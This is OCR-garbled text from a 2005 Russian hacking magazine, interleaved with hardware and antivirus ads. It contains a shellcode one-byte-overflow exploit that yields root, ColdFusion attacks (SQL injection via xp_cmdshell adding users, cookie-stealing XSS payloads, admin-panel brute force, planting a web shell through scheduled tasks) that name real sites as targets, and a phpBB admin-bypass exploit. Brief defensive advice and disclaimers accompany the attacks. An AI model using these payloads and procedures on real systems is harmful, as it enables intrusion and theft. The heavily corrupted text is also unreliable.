$ зиЬо сЬтоЬ +з опе_Ьу!е_оѵег 

$ ./опе_Ьу!е_оѵег 'регі -е 'ргіпі '\х90"х70; ргіпі м \х31\хс0\х50\хЬ0\х17\х50 
\хсЬ\х80\х50\х68\х6е\х2І\х73\х68\х68\х2І\х2І\х62\х69\х89\хеЗ\х50\х54\х 
53\х50\хЬ0\хЗЬ\хсЬ\х80";ргіпІ "Н"хЗЗ; ргіпі " ргіпі "\х44\хеЬ\хЫ\хЫ";'' 
Виз еггог 

Адреса, по которым располагаются данные, будут отличаться при 
выполнении в отладчике и вне его из-за различий в переменных 
окружения. Так что для точного попадания на адрес, по которому 
хранится второй аргумент, нам придется изменить длину первого 
аргумента. Это не сложно и банальным перебором мы можем най- 
ти необходимую длину: 




Поддерживаются процессоры Іпіеі Репйит4 
серий 5ХХ, 6ХХ (ЕМ64Т) и Сеіегоп Э серии ЗХХ 
в корпусе КЗА775. 

Поддерживается память ЭОР2 400/533 
объемом до 4ГБ. 

Встроенная сетевая карта 10/100/1000 

7.1 -канальное аудио 



К8Ы §и-г 



$ ./о п е_Ьу!е_о ѵе г 'регі -е 'ргіпі '\х90"х70; ргіпі м \х31\хс0\х50\хЬ0\х17\х50 
\хсЬ\х80\х50\х68\х6е\х2І\х73\х68\х68\х2І\х2І\х62\х69\х89\хеЗ\х50\х54\х 
53\х50\хЬ0\хЗЬ\хсЬ\х80";ргіпІ "Н"х57; ргіпі " ргіпі "\х44\хеЬ\хЫ\хЫ";'' 
#ІЬ 

иісІ=0(гооІ) 

Вуаля, готово! 

[бочка дегтя] Однако в каждой ложке меда есть бочка дегтя. Для то- 
го чтобы такая уязвимость была эксплуатируемой, описанным способом 
необходимо выполнение следующих условий: 

Щ Во-первых, число байт в буфере должно быть кратным четырем, ина- 
че однобайтовое переполнение не изменит сохраненного значения еЬр. 
\ 2 \ Во-вторых, необходимо, чтобы атакующий имел возможность контро- 
лировать область памяти, на которую укажет измененный еЬр. 

И тем не менее, не смотря на очевидные ограничения, многие ошибки 
подобного плана в реальных приложениях подвержены эксплуатации, 
как, например, однобайтовое переполнение в тосІ_ззІ в АрасГіе и пере- 
полнение в ѵѵи-КрсІ © 




Поддерживает процессоры АІѴЮ АіЫоп 
64/РХ/Х2 с двуядерной архитектурой. 

Два разъема расширения РСІ-Е хі 6 с 
поддержкой технологии БЫ. 

5АТА2 РАЮ (с ПО ІМѴ РАЮ), поддерживающий 
режимы РАЮ 0, 1 , 0+1 , 1ВОЭ. 

** 7.1 -канальное аудио, совместимое с АС97 ѵ.2.3. 

Интерфейс ІЕЕЕ1394. 







Все вышеперечисленные функции опциональны для всех изделий МЗІ. 

М5І - зарегистрированная торговая марка компании Місго-ЗІаг ІпГІ Со., Ш. 
Спецификации могут изменяться без предварительного уведомления. 

Все зарегистрированные торговые марки являются собственностью своих владельцев. 
Любые конфигурации, отличные от оригинальных, не гарантированы. 



За дополнительной информацией обращайтесь 
















ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20МЕ РЕВВІІМ НЬЮСЫ 




Жуки СоІсІРизіоп 



НАШИ ЗАОКЕАНСКИЕ ДРУЗЬЯ НЕ РАЗДЕЛЯЮТ НАШЕГО МНЕНИЯ О БЕСПЛАТНЫХ ПРИЛОЖЕНИЯХ И ПРЕДПО- 
ЧИТАЮТ ПЛАТНЫЕ РЕШЕНИЯ — ЭТО В КАКОЙ-ТО МЕРЕ ЯВЛЯЕТСЯ ДЛЯ НИХ ГАРАНТИЕЙ КАЧЕСТВЕННОЙ 
ПОДДЕРЖКИ. ТРУДНО СКАЗАТЬ, ВИНОВАТ ЛИ В ЭТОМ МЕНТАЛИТЕТ, НО ПРИ ВЫБОРЕ ПЛАТФОРМЫ ДЛЯ СОЗ- 
ДАНИЯ СЕРВЕРНЫХ ѴѴЕВ-ПРИЛОЖЕНИЙ ВСЕ БОЛЬШЕ КОМПАНИЙ ОТДАЮТ ПРЕДПОЧТЕНИЕ СОиЭРІІЗІОІЧ, А 
НЕ РЕПІ_ ИЛИ РНР. МЫ С ТОБОЙ ВОСПРИМЕМ ЭТУ СИТУАЦИЮ КАК ФАКТ И НАЧНЕМ ИЗУЧАТЬ ВОПРОС БЕЗО- 
ПАСНОСТИ: ВЕДЬ ЧЕМ ЧАЩЕ ВСТРЕЧАЮТСЯ СРМ-СЦЕНАРИИ, ТЕМ ВАЖНЕЕ ДЛЯ НАС ПОНИМАТЬ, КАКИЕ ИЗЪ- 
ЯНЫ МОГУТ ПРИСУТСТВОВАТЬ В ПОДОБНЫХ СИСТЕМАХ I Зкакипо! АІех (а4_рег1есІ@таіІ.ги) 



Основные ошибки программистов 
в с^т-сценариях 

[разберемся с основами] Первым делом нужно разобраться с тем, 
что же из себя представляет СоІсІРизіоп. Это сервер приложений (арріі- 
саііоп зегѵег), которому веб-сервер (чаще всего 133, но встречаются и 
связки с АрасПе), отдает на обработку специальные сіт-файлы — про- 
исходит это абсолютно аналогично тому, как рНр-файлы обрабатывают- 
ся интерпретатором РНР. Файлы .сіт представляют собой код на языке 
СРМІ_ (СоІсІРизіоп Магкир І_апдиаде) — языке сервера СоІсІРизіоп, кото- 
рый является нестрогим подмножеством ХМІ_: все операторы и выраже- 
ния представляются набором специальных тэгов. По этой причине сіт- 
сценарии порой выглядят как дизайнерские шаблоны для какой-то Іет- 
ріаіе-системы :). Однако такое внешнее сходство обманчиво: СоІсІРизіоп 
предоставляет массу возможностей и по функциональности едва ли ус- 
тупает любому другому языку сценариев. 

Для настройки сервера используется СоІсІРизіоп Асітіпізігаіог — специаль- 
ный ѵѵеЬ-инструмент, позволяющий через удобные диалоги конфигуриро- 
вать систему. Более подробно об этом мы поговорим ниже. А сейчас да- 



вай пройдемся по языку, чтобы у 
тебя не возникало элементарных 
вопросов. Прежде всего нужно уяс- 
нить тот факт, что все СРМЬтэги 
начинаются с префикса сі, после 
которого идет, собственно, коман- 
да. Например, две самые использу- 
емые в любом языке команды — 
присвоение и условие — здесь выг- 
лядят так: 

<сТіТ ѵаг пед 5> <!— если ѵаг 

не равняется пяти - > 

<с!$еІ ѵаг = 5> <!— устано- 

вить ѵаг=5 - > 

</ сТіТ> 

Как видно из примера, операторы 
сравнения напоминают Ызр'овс- 




\ I / 




По сведениям гугла, в Ин- 
тернете находится при- 
мерно 331 000 000 СТМ- 
сценариев. Так что ло- 
мать, как ты понимаешь, 
есть что. 

Эта статья написана иск- 
лючительно в ознакоми- 
тельных целях, чтобы 
привлечь внимание к воп- 
росам безопасности СШ- 
сценариев. 

На нашем диске ты найдешь 
свежую ігіаГку Масготебіа 
СоШТизіоп, набор докумен- 
тации, а также упомянутые 
в статье сценарии. 



\ 





кие: ЕО (или 15) для равенства, І\ІЕО для неравенства, ОТ и І_Т — боль- 
ше-меньше. Также видно, что комментарии вставляются практически 
так же, как в НТМІ_, только с каждой стороны — три тире, а не два. 
Большинство тэгов имеют соответствующие им закрывающие элемен- 
ты, как <сШ> (в примере выше). Также тэги могут иметь и атрибуты: ска- 
жем, у цикла типа Іог будет 3 — 4 атрибута: имя переменной цикла, два 
атрибута с границами цикла и необязательный атрибут шага: 



ссііоор іпсіех = "і" Ігот = "1" Іо = "10" зіер = "2"> 

... НТМІ_ или СРМІ_ код... 

</сТІоор> 

Кроме этого, частью СРМІ_ является СРЗсгірІ — очень смахивающий на 
ЗаѵаЗсгірІ язык; для его использования достаточно заключить требуе- 
мые инструкции в пару тэгов ссізсгірІх/сізсгірЬ. Вот первый пример, 
написанный на СРЗсгірІ: 

ССІЗСГІрЬ 

і! (ѵаг лед 5) 
ѵаг = 5; 

</сІзсгірІ> 

Несмотря на то, что все авторы статей и книг по СРМІ_ рекомендуют ис- 
пользовать СРЗсгірІ ввиду его скорости по отношению к тэговому СРМІ_, 
полевые замеры скорости наталкивают на вывод, что либо это те же яй- 
ца, только синтаксис привычнее, либо СРЗсгірІ рулит только для какого- 
то узкого круга задач. В основном, сервер СоІсІРизіоп работает под вин- 
дами (есть реализации под Зоіагіз, І_іпих, СоЬаІІ, НР-ІІХ), и СоІсІРизіоп 
умеет работать с реестром, данными виндовой доменной аутентифика- 
ции, іпі-файлами и прочими фишками. 

Говорят, что писать на СоІсІРизіоп невероятно просто, так как он вмеща- 
ет в себя огромное количество функций самого различного назначения. 
Что больше всего радует — наличие удобных функций для работы с 



ССЫЛКИ ПО ТЕМЕ 

► ѵѵѵѵѵѵ.тасготесііа . сот/зоііѵѵаге/соісііизіоп — новинки, 
документация, «орехи и болты» от производителя. 

► ммм.тасготесііа.сот/сіизіоп/ехсііагіде — подборка 
готовых приложений, функций, кастом-тэгов. 

► ѵѵѵѵѵѵ.еазусіт.сот — документация; можно 
пользоваться, когда под рукой нет СоІсІРизіоп Зіисііо. 

► ѵѵѵѵѵѵ.ЬгаіпЬепсІгі.сот — вообще, это тест-центр; можно, 
пройдя тест, получить звание мастера СоІсІРизіоп 

и этот факт освятить в своем резюме (время от времени 
они делают большинство тестов бесплатными). 

► ѵѵѵѵѵѵ.іизеЬох.огд — подробно о РизеВох'е. 

► сШ.іогеѵег.кг — подборка интересных статей 
по СоІсІРизіоп на русском языке. 

► Ы\р://Ыд6.карра . го/~рсіоги/сіт/сісіесгурі.с — 
исходник СРйесгурІ. 

► уѵуѵѵѵ.зесигііеат . сот/іооІз/5^РОВООГРО . МтІ — СоІсІРизіоп 
ѴѴеЬ ЗІіеІІ (правда, использованный там <с!ехесиІе> 
работает только на серваках с ѴѴіпсІоѵѵз ІЧТ 4.0 и ІІІМІХ). 



массивами, структурами (именованными массивами) и списками. Также 
впечатляет удобная контекстная справка и несколько других бонусов ти- 
па авто-подстановки атрибутов или закрывающих тэгов, встроенных в 
такие редакторы, как НотеЗіІе и СоІсІРизіоп Зіисііо. 

Далее следует отметить одну особенность работы с СЕМЬ. Наряду с дру- 
гими языками, он поддерживает многократное использование кода, 
оформленного в виде пользовательской функции, но кроме этого пре- 
дусмотрен механизм определения собственных тэгов (сизіот Іадз): ес- 
ли в функции значения передаются позиционно (скажем, в функции отк- 
рытия файла первым параметром всегда идет строковое имя файла, а 
вторым — режим работы), то вызов кастом-тэга строится на именова- 
нии параметров-атрибутов — это очень похоже на обычный Гііті-тэг с 
несколькими атрибутами вроде ширины и цвета, только за поведение 
такого тэга отвечает программист. В принципе, кастом-тэг — законо- 
мерное введение для тэгового языка. 

Сталкивался ли ты в РНР с чем-нибудь вроде $$ѵаг? Это выражение на- 
зывается «переменная переменная» (ѵагіаЫе ѵагіаЫе), то есть результа- 
том следующего кода будет «666»: 



$ѵаг="Іоо"; 

$Тоо=666; 
есііо $$ѵаг; 

Если в РНР этим, похоже, мало кто пользуется, то в СоІсІРизіоп такая 
фишка встречается довольно часто. Для этого имя переменной нужно 
окружить символами ,, # и ("паунд"). Так, например, у тебя есть десять пе- 
ременных видахі, х2,..., хІО. Пройтись по ним можно так: 

ссііоор іпсіех = "і" Ігот = "Г Іо = "10"> 
ссізеі "х#і#" = "ѵаг " & і> 

</сТІоор> 

В принципе, это удобная фича, но если перегнуть палку, то мозг начина- 
ет кипеть. Во всяком случае, если в .сіт файле ты хочешь написать Гііті- 
константу цвета типа "#000011", то паунд нужно экранировать — 
"##000011", иначе задолбишься искать ошибку. Любимый тернарный опе- 
ратор вида х==у ? «х равен у»: «х не равен у» есть и здесь, только в СРМІ_ 
перед скобками нужно написать "ИР" и не забыть, что оба выходных вы- 
ражения будут выполнены. Есть одно важное отличие от РНР: вызов неп- 
роинициализированной переменной приводит к ошибке. Вот теперь, ког- 
да у тебя в голове от всего вышесказанного выстроилась стройная и чет- 
кая каша, можно приступить к рассмотрению уязвимостей. 

[№1: 8ЯІ-іп|есііоп] Прежде чем разбираться с тем, как в СоІсІРизіоп 
работает зді-іпіесііоп, нужно уяснить, что для работы с БД используется 
парный тэг <сідиегу>, внутри которого простым текстом вставляется 
80І_-запрос. Допустим, при запросе страницы ѵѵѵѵѵѵ.зегѵег.огд?ІіетЮ=5 
выполняется следующий код: 

сенегу пате="дѲеІІІетОеІаіГ сіаІа5оигсе="..."> 

ЗЕІ.ЕСТ * РВОМ Нет ѴѴНЕВЕ ІІетЮ=#ІЖ.ІІетЮ# 

</сТдиегу> 

Радуйся, если БД является МЗЗОІ_ Зегѵег: ты раздобыл практически го- 
товый шелл, поскольку стандартная процедура М350І_ хр_стсІ5ИеІІ с ра- 
достью исполнит любой твой каприз. То есть после небольшого измене- 
ния ІІВІ_'а на ѵѵѵѵѵѵ. зегѵег. огд?ІІетЮ-5;ехес%20тазІег..хр_стбзІіеІІ%20 
"пе\%20изег%20ре\уа%20раззмогб%20/адд запустится процедура 
хр_стсІ5ІіеІІ и добавит нового юзера. Как бороться с этим недугом? 
Очень просто: нужно проверять и экранировать входные данные, ис- 
пользовать свои зіогесі ргосесіигез вместо кусков ЗОІ_ ( «перенос логики 
на сторону сервера БД» или «создание легкого клиента»), а также 
юзать специальный тэг <сідиегурагат>, который позволяет передать в 
запрос данные, четко указав их тип и максимальную длину. 

[N22: прямой вызов темплейтов] Нельзя сказать, что это будет рабо- 
тать только для СоІсІРизіоп'а, и все-таки. Принцип простой: напрямую выз- 
вать скрипт, который обычно сам по себе не вызывается, а имеет какую-то 
чисто служебную цель; например, есть такая практика в программировании 
— выносить запросы к базе в отдельные файлы — так почему бы этим не 
воспользоваться? Трудности две: узнать имя нужного файла и суметь ис- 
пользовать его в своих целях, ведь править код никто не даст. Самым прос- 
тым решением является изучение готовых проектов и использование най- 
денных багов. Для примера, часто для СоІсІРизіоп-проектов используется 
такая надстройка, как РизеВох, которая за счет хитрого наименования, раз- 
биения и расположения файлов существенно облегчает процесс разработ- 
ки (хорошая вещь, имеет реализацию для РНР). Исходники общедоступны 



[ХАКЕР 11 [83] 05 > ВЗЛОМ 069 ] 







[хакер 11 [83] 05 > ВЗЛОМ 070 ] 




информация об абсолютном пути ѵѵеЬ-каталога пригодится любому хакеру 



и ждут твоего анализа. Сложность в том, что сорцы могут быть закодирова- 
ны такой утилитой, как СРЕпсобе — она идет в стандартной поставке сер- 
вера и реализует ОЕЗ-шифрование. Но курс «Кодирование информации» 
сейчас идет даже в средней школе, поэтому ниже есть ссылка на исходник 
проги СРБесосІе, которую один наш нехороший соотечественник пытается 
в скомпилированном виде продавать по 18 буказоидов. 

Как бороться с багом? Запросы и прочие важные файлы рекомендует- 
ся выносить в недоступную через браузер папку. Кроме этого, в специ- 
альный темплейт арріісаііоп.сіт, который вызывается при запросе лю- 
бого файла, можно вставить проверку пути к вызываемому файлу. 

[№3: получение абсолютного пути] Считается, что уровень кри- 
тичности такого недосмотра админа весьма низкий, но хакеру такая ин- 
фа может оказаться весьма кстати. Дело в том, что если запросить у сер- 
вера, работающего под N3, файл, состоящий из имени МЗ-ЭОЗ устрой- 



БАГИ СОІЛЭРІІЗЮМ РІІ5ЕВОХ Ѵ4.1.0 

РизеЬох — это стандартная для СоІсКизіоп технология 
построения ѵѵеЬ-систем, которая подразумевает после- 
довательное подключение и выполнение определенных 
файлов в зависимости от управляющего параметра. 
Что-то вроде того: 

<сізѵѵіісіі ехргеззіоп="#Тизеас1:іоп#"> 

<сТсазе ѵаІие= "ас11"> 
ссііпсіисіе ІетрІаІе= "Іодіп_ИеасІег.сТт"> 

<сТіпсІисІе ІетрІаІе= "Іодіп_Тоо1:ег.сТт"> 

</с!сазе> 

<сТсазе ѵаІие="ас12"> 

<сТіпсІисІе ІетрІаІе= "диегугезиІ1.сТт"> 

</сТсазе> 

</СІ$ѴѴІІСІ1> 

Чтобы получить внушительный список сайтов, использу- 
ющих РизеВох, достаточно набрать в гугле 
ЧпигІ:.сІт?ІизеасІіоп“. 

В конце этого лета на багтрак-лентах появились сооб- 
щения о баге во РизеВох. Элементарным запросом ста- 
ло возможным увести пользовательские куки и выпол- 
нить произвольный код на стороне клиента: 

► тшМеіи/іпбех.с1т?1изеасІіоп=><зсгірІ>боситепІ.ІосаІіоп= 
"Шр'У/жм. хакер. ги"</зсгірІ> 

Возможно получить доступ к отладочной информации 
элементарным запросом: 

► и/и/и/,5 ііе.ги/іпсіех.сіт ?Іизеас1іоп= ? 

К счастью, не все сайты, использующие РизеВох Ѵ4.1.0 
уязвимы — на некоторых проектах может быть установ- 
лена собственная страница с сообщением об ошибке, 
где-то будет выполняться на все ^-конструкции. Так, 
например, возможен вариант, при котором будут рабо- 
тать все запросы, кроме тех, что обращаются к пользо- 
вательским кукисам. 

В случае, если ты наткнулся на такой ресурс, стоит поп- 
робовать еще такой запрос: 

► шшш.зііе . ги/іпсіех. сіт ?1изеасІіоп=1изеЬох. о ѵегѵіе //'хзсгірЬаШ 
(с1оситепі.соокіе)</зсгірІ>< 



ства (ШІ_, РВЫ, и др.) 
и окончания .сІЬт, то 
сервер выдаст ошибку 
с указанием абсолют- 
ного пути к искомому 
файлу, который дол- 
жен был бы лежать в 
ѵѵеЬ гооі-папке. Напри- 
мер, запрос адреса 
/7 іір ://паііопа! .ипііесі- 
шау.огд/пиІ.сІЬт вернет 
страницу с ошибкой 
(представленной на ри- 




начинаем добавление задания 



сунке слева). Опыт показывает, что часто плохо настроенный сервер ве- 
дет себя примерно так же при запросе любой несуществующей страни- 
цы, но этот способ использует специфику настройки веб-сервера. 

Как бороться? В настройках N5 поставить галочку «Проверка существо- 
вания файла» для расширений .сіт и .сІЬт. 

Еще есть один вариант получения пути, но он работает только на серве- 
рах версий 4. Ох, которые уже не пользуются популярностью — сервер 
кэширует вызываемые страницы, а всю инфу по кэшу складывает в 
файл сісасііе.тар в одну папку с вызванным: там находятся имена вы- 
зываемых кэш-файлов в понятиях файловой системы сервера. Для при- 
мера сделай такой запрос в гугле: іпигіісісасііе.тар, открой любую ссыл- 
ку, и ты увидишь что-то вроде этого: 



[ТМе.сТт] 

Марріпд=с:/сІи5іоп/Ьіп/сЙад5ЛСРС197.1тр 
ЗоигсеТіте81:атр=05/1 8/1 999 06:17:00 РМ 



[Ы°4: доступ к отладочной информации] Бага не очень страш- 
ная, но знать о ней надо. Вообще, за счет установок в СоІсІРизіоп 
Асітіпізігаіог'е, либо после запуска специального тэга в конце .сіт фай- 
ла может выдаваться отладочная инфа, очень нужная во время разра- 
ботки: время работы скрипта, (ЗЕТ и Р08Т переменные, а также СОІ- 
переменные (что-то вроде переменных окружения (см. рисунок на 
правой странице)). Что можно с этого поиметь: абсолютный путь к выз- 
ванному файлу в файловой системе веб-сервера, а также имя и версию 
самого веб-сервера (чаще всего N3, что косвенно говорит о типе ис- 
пользуемой операционки). Чтобы добиться явления такого чуда, попро- 
буй дописать к урлу параметр тобе со значением беЬид, например, так: 
уѵуѵуѵ .рЫІІірзпігег .сот/ИЬгагу/сазез/ИЬ_сазе368 .сіт? тоде=деЬид . Бо- 
роться с уязвимостью просто: нужно ввести ІР типа 127.0.0.1 в настрой- 
ках дебага СоІсІРизіоп Асітіпізігаіог. 



[N25 СоІсІРизіоп Асітіпізігаіог] Интересная уязвимость, свойствен- 
ная только СоІсІРизіоп, как уже было сказано, тюнинг сервера осущес- 
твляется при помощи специальной ѵѵеЬ-тулзы. При сетапе СоІсІРизіоп- 
админ заходит туда так: Ыір://1 27.0.0. 1/СГЮЕ/асітіпізігаіог/іпсІех. сіт . 
Достаточно часто админ забывает отрубить доступ к СоІсІРизіоп 
Абтіпізігаіог'у с ІР-адресов, отличающихся от 127.0.0.1, поэтому твоя за- 
дача заключается в нахождении СоІсІРизіоп-сервака и проверке такого 
урла: Шр://зегѵег. сот/СРЮЕ/асІтіпізігаІог/іпсІех. сіт (иногда приходится 
играть регистром в именах папок — не у всех же винды стоят). Плюс в 
том, что тебе нужен только пароль — логинов тут не предусмотрено, по- 
этому можно побрутфорсить. Сам пароль вводится во время инсталля- 
ции сервера (см. рис внизу). 

Быстрая проверка результатов гуглового запроса доодіе Іііеіуреюіт да- 
ла пару сайтов, имеющих лопоухих админов — это нью-йоркская пуб- 
личка ( ѵѵѵѵѵѵ.пурі.огд ) и какая-то хом-пага (ил/ѵи среіеігеііад.сот). 

Как бороться: отключить доступ с нелокальных адресов в настройках 
СоІсІРизіоп Асітіпізігаіог 
и проставить пароль 
вроде ІІКО*81ТЫОп. 

[что это даст] Тут 

благосклонный чита- 
тель может спросить, 
а что, мол, я могу пои- 
меть с сервака, если я 
получил-таки доступ к 
СоІсІРизіоп Асітіпізіга- 
Іог'у? А оказывается, 
что вот здесь начина- 
ется самое лакомое: 
во-первых, если сер- 




ах, если бы здесь был дефолтовый пароль! 









вак крутится на 118'е, то с помощью специ- 
ального ^ѵа-апплета на вкладке Зегѵег -> 

Зегѵег ЗеНіпдз-> ЗеШпдз ты можешь смело 
лазать по дереву файлов на серваке, затем 
установить ссылку Еггог Тетріаіе на свой 
удаленный скрипт и после этого вызвать на 
сервере несуществующую страницу для за- 
пуска своего злокачественного скрипта; во- 
вторых, есть более универсальный способ 
сделать бяку — хитрым движением хвоста 
залить на сервак свой скрипт, то есть фак- 
тически сделать себе веб-шелл. Для этого 
иди на вкладку Зегѵег ->АіДотаІесІ Тазкз-> 

ЗсІіесІиІе Тазк, там жми на кнопку Абб ЗсПебиІесІ Тазк. На этой стра- 
нице введи имя задачи, лучше что-нибудь неприметное для админа 
(если такое вообще бывает; для примера посмотри на рисунок 
справа на левой странице). 

Проверь, чтобы поле Орегаііоп имело значение НТТРВециез!. Затем 
в поле ІІВІ_ пиши ссылку на свой сценарий, после чего в поле РиЫізІі 
отметь архиважную для нас галочку Заѵе оифиі Іо а Іііе, и затем ука- 
жи путь и имя выходного файла на сервере — путь можно узнать од- 
ним из описанных выше способов, а если не вышло, то в другом ок- 
не браузера запроси у этого сервера несуществующий файл, а в 
СоІсІРизіоп Асітіпізігаіог'е иди на вкладку ТооІз-> І_одз апб 5іаІізІісз-> 
І_од Рііез, заходи в ѵѵеЬзегѵег.Іод и смотри, где сервак искал ответ на 
твой хитрый запрос. После всех этих конвульсий , смело жми кнопку 
«ЗиЬтіІ СИапдез», а на появившейся странице нажми картинку Оо 
рядом с именем твоей задачи (она в последнем столбце Сопіоіз). Ес- 
ли все отлично, то на сервере будет создан файл с текстом указан- 
ной страницы, на которой, разумеется, находился код простейшего 
СЕМЬ ѵѵеЬ-шелла и теперь этот файл можно смело вызывать через 
адресную строку браузера. 



[выводы] Мы с тобой освоили основы создания сіт-сценариев и ра- 
зобрались с некоторыми проблемами безопасности. На самом деле, ес- 
ли ты наберешь в поиске на ЗесигіІуРосиз.сот СоІсІРизіоп, то приятно 
удивишься количеству появившихся ссылок :). Среди них легко найти уязвимостях в продуктах, написанных на СРМІ_. Успехов тебе в освое- 
как описание багов самого детища Масготесііа, так и упоминания об нии нового горизонта :)! Будут вопросы — пиши @ 




ЗОЫШЕСТЮМ В ІМ5ТАВОАРЮ 1.3 

К сожалению, популярных форумов вроде рНрВВ, написанных на СРМ нет. 
Однако из тех, что я нашел, все оказались бажными :). За примером далеко 
идти не надо — ІпзіаВоагсІ 1.3 страдает обильными зрі-іпіесііоп уязвимостями: 

► и/и/и/. ехатріе . сот/іпзіаЬоаМ/іпсІех. сіт ?ігтіб= 1 АІ\Ю и. изегісі ІІ\І (зеіесі изегісі ігот изегз) 

► и/и/и/, ехатріе . сот/іпзІаЬоагсі/іпсІех. сіт ?ігт'\6= 1 & \рсі6= 1 8СЦ. 

► и/ и/и/, ехатріе . сот/іпзІаЬоагсі/іпсІех. сіт ?ігт'\6= 1 8йі&1рсіб=1 

► и/и/и/, ехатріе . сот/іпзІаЬоагсІ/іпсІех. сіт ?рг=герІутзд& ігтіб= 1 & ІрсШ= 1 801-&тздіс1=11 

► и/и/и/, ехатріе . сот/іпзІаЬоаМ/іпсІех. сіт ?рг=герІутзд& ігт'\6= 1 & Хрсі6= 1 & тздісі= 1 1 50/. 

► и/ и/и/. ехатріе . сот/іпзІаЬоагсІ/іпсІех. сіт ?са\і6=- 1 ІІІ\ІІ0І\І 8ЕІ-ЕСТ изегісі, 1,1..., Ігот изегз 




версия 



«лппплі.сіпліеЬ.сот 



НОВЫЕ ВОЗМОЖНОСТИ ПО ЗАЩИТЕ ИНФОРМАЦИИ 






обновленное антивирусное ядро с многократно улучшенной антивирусной функциональностью 
детектирование шпионских (Бруѵѵаге), рекламных (Асіѵѵаге) и других нежелательных программ 
эффективная антивирусная защита серверов под ѴѴіпсіоѵѵб N"172000/2003 Бегѵег 
значительно увеличенный список проверяемых форматов файлов и обрабатываемых упаковщиков 
существенно расширены средства администратора для управления ЕпІегргІБе Биііе 



ООО "Доктор Веб 






в*** 



Обновления программных модулей и вирусных баз осуществляется немедленно по мере обнаружения новых угроз! 










ЮНИТЫ КРЕАТИФФ КОДИНГ ІІІЧІХОЮ СЦЕНА [ВЗЛОМ] ИМПЛАНТ РС_20ЫЕ РЕВВІІМ НЬЮСЫ 




Итоги форумной войны 



СЛОЖНО НЕ ЗАМЕТИТЬ, ЧТО БОЛЬШИНСТВО СОВЕРШАЕМЫХ НЫНЕ ВЗЛОМОВ ОСУЩЕСТВЛЯЕТСЯ ЧЕРЕЗ УЯЗ- 
ВИМОСТИ ѴѴЕВ-СЦЕНАРИЕВ. ВНЕШНЕ ТАКОЙ ВЗЛОМ МОЖЕТ ПОКАЗАТЬСЯ ВПОЛНЕ ПРОСТОЙ ЗАДАЧЕЙ: НАШЕЛ 
ДЫРЯВЫЙ СКРИПТ, ЗАТЕМ ПОДХОДЯЩИЙ ЭКСПЛОЙТ — И ДЕЛО В ШЛЯПЕ. НО КАК ТОЛЬКО ДЕЛО ДОХОДИТ ДО 
ПРАКТИКИ, СТАЛКИВАЕШЬСЯ С СОВЕРШЕННО НЕВЕРОЯТНЫМИ ПРОБЛЕМАМИ I Степан Ильин ака Зіер (!ад@геаІ.хакер.ш) 



Все главные сплоиты и баги 
популярных форумов 

[в чем проблема?] Если ты хоть раз пытался использовать для взло- 
ма эксплойты, то должен понимать, о чем идет речь. Согласись, найти 
уязвимый сервис или ѵѵеЬ-сценарий сегодня не проблема. Ошибки, в 
том числе и критические, есть практически везде, а многочисленные со- 
общения в ленте багтрака — лишнее тому подтверждение. Куда слож- 
нее подобрать подходящий и, что немаловажно, работоспособный 
эксплойт. Обычно проблемы начинаются на стадии его применения. То 
эксплойт вываливается с ошибкой, то отказывается компилироваться, 
то, ничего не выполняя, пытается отформатировать винчестер :). Более 
того, многие разработчики умышленно оставляют в коде эксплойта 
ошибку, чтобы избежать его использования теми, кому он, по правде го- 
воря, и не нужен. 

Багов так много, что иногда смотришь на форум и знаешь, что он 
бажный. Но поломать его никак не получается. Не беда! Сегодня мы 
подготовили для тебя самый полный гид по горячим уязвимостям са- 
мых популярных форумов рПрВВ и ІРВ. Как говориться, поставим все 
точки над і. 



[рГірВВ <= 2.0.12 — доступ к админ-панели] В любой версии 
рПрВВ младше 2.0.13 возможно легко получить доступ к администра- 
торскому интерфейсу. Столь серьезная брешь в безопасности сущест- 
вует благодаря некорректному сравнению идентификационных данных 
в момент авторизации пользователя. Программисты допустили логичес- 
кую ошибку на 82 строке сценария іпсІисІез/зеззіопз.рЬр: 

іІ($5е55іопсІаІа[ , аиІоІодіпісГ] == $аиІо_Іодіп_кеу) 

На первый взгляд, все нормально. Проверяется равенство идентифика- 
торов, если все правильно, то пользователь впускается в систему. Од- 
нако это не совсем так. Дело в том, что оператор «==» возвращает Іше, 
если его операнды «равны» друг другу, причем слово «равны» здесь по- 
нимается довольно своеобразно. Так, к примеру, «+1 .а», с точки зрения 
оператора «==», это то же самое, что и «0001 ». Дело в том, что при при- 
ведении типов и та, и другая строка станет единицей и, значит, они бу- 
дут равны друг другу. По этой причине в РНР есть оператор «тождест- 
венно равно» (три знака равно, ===), который, кроме всего прочего, под- 
разумевает еще и совпадение типов операндов. Именно этот оператор 
и следовало бы использовать в этом месте сценария разработчикам. Но 




они об этом не подумали, кое-куда 
не досмотрели и получили серьез- 
ную брешь в своем продукте. 

Для того чтобы пользователя про- 
пустили в систему, необходимо 
лишь, чтобы длина идентификато- 
ра в его кукисе совпадала с дли- 
ной $аиІо_Іодіп_кеу. Подобрать не- 
обходимое значение аиіоіодіпісі и 
записать в плюшку несложно, с 
чем великолепно справляется 
эксплойт от команды [Г\І]ео [3]есигі- 
\у [Т]еат. Эксплойт написан на 
чистом С и отлично компилируется 
под любую платформу, так как не 
использует каких-либо специфи- 
ческих библиотек. Тем не менее 
есть один нюанс: его работа воз- 
можна только совместно с браузе- 
рами Мо 2 ІІІа или Рігеіох. Эти брау- 
зеры хранят значения соокіез в 
файле соокіез.М (бинарник экспло- 
йта нужно поместить в директорию 
с этим файлом), и именно в этот 
файл эксплойт осуществляет за- 
пись специально составленной 
плюшки. 

Скачать эксплойт можно отсюда — 
\л/\л/\л/ .зесигНуІаЬ .ги/530 1 7.МтІ. Пе- 
ред использованием не забудь ав- 
торизоваться на форуме, отключив 
при этом опцию сохранения пароля. 




Не спеши списывать со 
счетов нерабочий экспло- 
йт. Не исключено, что 
хакеры намеренно сделали 
какую-то ошибку, то есть 
реализовали защиту от 
скрипткидис. Изучи уязви- 
мость, которую использует 
этот эксплойт, и проштуди- 
руй его код. Информация о 
доводке эксплойта до ума 
нередко появляется на 
зесигііу-форумах и сайтах. 



\ I / 




/ I \ 



Не стоит забывать, что все 
действия взломщиков 
противозаконны и эта 
статья предназначена 
лишь для ознакомления. 
За применение материала 
в незаконных целях автор 
и редакция ответственнос- 
ти не несут. 




Лучшая защита от свежих 
багов — своевременное 
обновление используемого 
софта и скриптов. Послед- 
ние версии рйрВВ и 
ІПѴІ5І0П Рот г Воагб можно 
скачать с шшш.рйрЬЬ.сот 
и ѵѵѵѵѵѵ.іпѵівіопЬоагб.сот 



